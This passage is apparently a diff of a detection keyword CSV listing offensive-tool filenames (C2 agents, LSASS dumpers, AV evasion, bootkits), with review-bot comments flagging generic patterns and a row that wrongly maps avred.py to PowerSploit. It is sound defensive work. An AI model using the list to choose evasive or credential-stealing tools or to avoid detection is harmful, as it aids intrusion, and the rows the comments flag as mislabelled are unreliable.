Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*\admin-panels.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*\agent_exe.exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*\alan.log*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 
- TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*\Alan.v*.zip*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*\Alcatraz.exe*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" -"*\All_attack.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*\All_attack.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*\Andrew.dmp*","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","0","N/A","10","4","370","101","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" "*\AntiSandbox.go*","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","10","0","2","2023-09-11T10:20:41Z","2023-08-31T09:36:38Z" "*\AntiSandbox.go*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","0","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z" 
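Review bot: The two added NetExec rows, `*\adcs.py*` and `*\add_computer.py*`, match on a bare module filename but carry `metadata_severity_score` "10" and an "N/A" `metadata_comment`. A hit on either pattern shows only that a file with that name appeared in a path or command line, and names this generic may well occur in other projects, so they are weak indicators on their own for endpoint detection. I would put an analyst hint in the comment column, for example `"generic module filename - correlate with other NetExec indicators"`, the way the MultiPotato row in this hunk uses `"pipe name"`, and consider a lower severity for these two rows. Both patterns also match backslash paths only; whether forward-slash variants are covered elsewhere in the file cannot be seen from this hunk.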
@@ -5971,31 +6044,32 @@ "*\Apollo.exe*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*\asm\x64\alter_pe_sections*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*\asm\x86\alter_pe_sections*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" -"*\Athena-*.zip*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*\Athena-*.zip*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*\AtomLdr\x64*","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","0","N/A","N/A","6","543","78","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" -"*\AutoSmuggle\*.cs*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","2","141","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*\AutoSmuggle\*.cs*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" "*\autotimeline*","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","1","N/A","N/A","2","119","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" "*\avetdbg.txt*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. 
as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" -"*\avred.py*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","172","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" -"*\avred.py*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*\avredweb.py *","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","172","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*\avred.py*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" 
+"*\avred.py*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*\avredweb.py *","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*\AzureC2Proxy\*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*\AzureC2Relay*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*\AzureHound.ps1*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - 
?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*\BabelStrike.py*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","0","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z" -"*\backdoored\*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*\backdoored\*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" "*\BackupOperatorToDA*","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","0","N/A","10","4","335","48","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" "*\BadZure*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them 
with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","0","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z" -"*\basicKitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*\beacon.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*\basicKitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*\beacon.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*\BeaconChannel.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*\BeaconConnector.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*\BesoToken.cpp*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*\BesoToken.exe*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*\BesoToken.vcxproj*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" -"*\bin\cme.exe*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*\bh_owned.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\bin\cme.exe*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*\bin\shepard\*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*\BITB-main*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","10","10","2645","463","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" +"*\BITB-main*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","10","10","2646","464","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" "*\Blackout.cpp*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*\Blackout.exe*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*\Blackout.sln*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" 
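Review bot: The `*\avred.py*` row that this hunk re-adds with a refreshed star count is still labelled `PowerSploit`, carrying PowerSploit's description, techniques (`T1059 - T1053 - T1003 - T1114 - T1204`) and repository link, even though the row directly above maps the same keyword to `avred`. PowerSploit is a collection of PowerShell modules, so this looks like a copy/paste mix-up rather than a second legitimate match. An analyst triaging a hit on this keyword would be given the wrong tool name and ATT&CK mapping, and a severity of 10 instead of the 9 on the avred row. I would delete the row beginning `"*\avred.py*","offensive_tool_keyword","PowerSploit",` instead of updating its counters, or replace its keyword with one that actually belongs to PowerSploit. The context row `"*\Blackout.sys*"` labelled `ThreatCheck` at the top of the next hunk may be the same kind of mismatch and is worth checking in the same pass.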
@@ -6003,41 +6077,41 @@ "*\Blackout.sys*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" "*\Blackout.vcxproj*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*\blindeventlog.exe*","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z" -"*\BloodHound.exe*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" -"*\BloodHoundGui\*.exe*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" -"*\BloodHound-win32-X64*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" -"*\bootkit-rs*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","0","N/A","N/A","5","448","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" +"*\BloodHound.exe*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*\BloodHoundGui\*.exe*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. 
BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*\BloodHound-win32-X64*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. 